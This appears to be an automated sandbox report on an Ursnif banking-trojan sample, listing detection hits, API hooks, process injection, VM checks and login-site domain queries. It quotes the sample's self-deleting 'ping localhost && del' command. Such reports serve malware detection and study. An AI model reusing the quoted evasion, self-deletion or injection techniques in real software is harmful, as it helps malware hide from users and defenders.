Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Self deletion via cmd delete

Show sources

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296

Thread sleep time: -6456360425798339s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5548			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4162			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i1aaekli.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWPw#
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000027.00000000.663110926.000002DE46A40000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.491335244.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: FpYf5EGDO9.exe, 00000000.00000002.510522869.000000000222F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,		44_2_0374A2FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,		44_2_0373E9AC

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

0_2_00401264

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_021BC1C2 push dword ptr fs:[00000030h]

0_2_021BC1C2

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: lycos.com
Source: C:\Windows\explorer.exe	Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: www.lycos.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 1B888A50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27740170000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 35D0000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580	Jump to behavior
